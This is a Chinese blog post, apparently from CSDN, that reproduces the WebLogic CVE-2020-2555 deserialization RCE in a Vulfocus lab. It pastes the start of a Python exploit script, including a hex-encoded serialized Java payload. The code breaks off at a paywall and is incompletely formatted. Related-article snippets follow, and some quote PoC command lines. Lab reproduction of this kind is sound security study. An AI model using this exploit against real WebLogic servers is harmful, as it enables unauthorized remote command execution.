weblogic-cve_2020_2555漏洞复现

最新推荐文章于 2024-04-16 03:05:28 发布
最新推荐文章于 2024-04-16 03:05:28 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42019588/article/details/113352393
版权

weblogic-cve_2020_2555漏洞复现

漏洞概述:

该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞,漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。

漏洞复现:

Vulfocus平台拉取下载启动漏洞镜像环境:

访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加console进行访问

在GitHub上下载攻击poc

# -*- coding: utf-8 -*-

import socket

import time

import ssl

import binascii

import urlparse

import argparse

import sys

globalProxies = {}

header = {

    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"

    }

def parseUrl(url):

    parsed = urlparse.urlparse(url)

    proto = parsed.scheme

    netloc = parsed.netloc

    ip = netloc

    if proto == 'http':

        port = 80

    else:

        port = 443

    if (':' in netloc):

        ip = netloc.split(':')[0]

        port = netloc.split(':')[1]



    uri = parsed.path

    return (proto, ip, port, uri)

def CVE_2020_2555(cmd):

payload_start =

'aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654
最低0.47元/天 解锁文章
Criss0101
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic CVE-2020-2555 反序列化RCE
qq_30302577的博客
04-01 3065
文章目录前言0x01 漏洞说明0x02 影响版本0x03 漏洞利用0x04 注意的地方0x05 修建议0x06 时间线0x07 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年3月6日,Oracle Coherence 反序列化远程代码执行漏洞(CVE-2020-2555)的细节被公开,Oracle Coherence为Oracle融...
Weblogic-CVE-2020-2555(VirtualBox虚拟机搭建)
weixin_43061533的博客
11-17 962
weblogic-cve_2020_2555 安装环境 靶机:一台Windows 2008 R2 服务器 攻击机:Win 10 配置环境 Jdk1.8.0_221 Weblogic 12.2.1.4.0 下载地址https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html 链接:https://pan.baidu.com/s/12Tt4Y7sXoht0RJD03f25bQ 提取码:1234 1.安装 【代码1
【网络安全---漏洞】Tomcat CVE-2024-1938 漏洞和利用过程(特详细)
最新发布
2401_83946826的博客
04-16 1238
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2020-2555-weblogic
Amdy_amdy的博客
04-14 2547
测试环境:centos6.5+weblogic12.2.1.4 攻击机:windows 10 脚本:https://github.com/wsfengfan/CVE-2020-2555 github上大佬的脚本 漏洞介绍: 一、漏洞简介 该反序列化的gadget存在与coherence包中。具体可以见分析 构造chain类似于common-collection的chain,可以照葫芦画...
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2117
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
Weblogic Cohence反序列化RCE(CVE-2020-2555)
锋刃科技的博客
08-27 535
影响版本 Oracle Coherence 3.7.1.17 Oracle Coherence 12.1.3.0.0 Oracle Coherence 12.2.1.3.0.0 Oracle Coherence 12.2.1.4.0.0 漏洞搭建 以管理员的方式运行安装 java -jar fmw_12.1.3.0.0_wls.jar 安装时选择了“含示例的完整安装”。其他默认即可 Your-IP:7001/console打开页面 漏洞 POC地址:https://
weblogic-CVE-2020-2555
m0_51369969的博客
07-14 238
Oracle WebLogic Server 产品中的漏洞(组件:WLS 核心组件)。受影响的受支持版本为 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0 和 12.2.1.4.0。易于利用的漏洞允许未经身份验证的攻击者通过 IIOP 访问网络来破坏 Oracle WebLogic Server。成功攻击此漏洞可导致 Oracle WebLogic Server 被接管。...
CVE-2020-2555:CVE-2020-2555 Python POC
04-15
CVE-2020-2555 python CVE-2020-2555.py ip port test.ser
CVE-2020-2555:Oracle Coherence 反序列化RCE
爱国小白帽
04-27 2796
CVE-2020-2555:Oracle Coherence 反序列化RCE 原创 PingPig [Timeline Sec](javascript:void(0)???? 今天 点击上方蓝色字体关注我们,一起学安全! 本文作者:PingPig(团队正式成员) 本文字数:699 阅读时长:2~3min 声明:请勿用作违法用途,否则后果自负 0x01 简介 Oracle Coherence为Orac...
weblogic反序列化之CVE-2020-2555漏洞分析
weixin_45682070的博客
03-18 4631
前言 CVE-2020-2555主要源于在coherence.jar存在着用于gadget构造的类(反序列化构造类),并且利用weblogic默认存在的T3协议进行传输和解析进而导致weblogic服务器反序列化恶意代码最后执行攻击语句。 Oracle Coherence组件默认集成在Weblogic12c及以上版本中。 ...
weblogic漏洞
m0_43397796的博客
01-17 3473
weblogic 漏洞 Weblogic ssrf https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2017021014312200001 实验环境 Weblogic服务器:centos6.5 weblogic版本10.3.6.0,IP 10.1.1.157 Redis服务器:centos6.5 redis-2.8.13, IP 10.1.1.111 host主机:kali IP随机 关闭防火墙 启动weblogic 这里有个坑 we
oracle cve 漏洞,CVE-2020-2555:Oracle WebLogic RCE漏洞分析
weixin_42639246的博客
04-04 526
写在前面的话在对Java Web应用程序进行研究时,不安全的反序列化漏洞在已经成为了攻击者或研究人员的常见目标了。这些漏洞将导致他人在目标设备上可靠地实远程代码执行,而且这类漏洞通常很难修。在这篇文章中,我们将对漏洞CVE-2020-2555(ZDI-20-128)进行分析。这是一个严重漏洞,CVSS评分为9.8,该漏洞将影响Oracle Coherence库,而这个库在Oracle Web...
漫谈-Weblogic-CVE-2020-2555
Ms08067安全实验室
05-01 4666
背景 2020年1月,互联网上爆出了weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺...
http get post_IT二部推送 | 我们唠唠HTTP 中 GET 与 POST 的区别
weixin_39692557的博客
11-22 167
欢迎关注,更多精彩等着你!这是一篇来自IT二部推送的技术硬核分享,重点是作者是一位神秘低调且具有娱乐精神的女程序员,既然如此神秘,照片呢咱们是别想看了,倒是可以一起来研读下她对HTTP 中 GET 与 POST的剖析哦~我们都知道,GET和POST是HTTP协议定义的。使用什么方式与应用层的数据怎样去传输是没有必然关系的。所以,HTTP没有要求POST必须放到请求体里面,GET必须要放在...
cve-2020-35339漏洞
07-11
cve-2020-14882漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用此漏洞,从而在受影响的服务器上执行任意代码。要漏洞,需要使用漏洞利用工具或手动编写特制的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值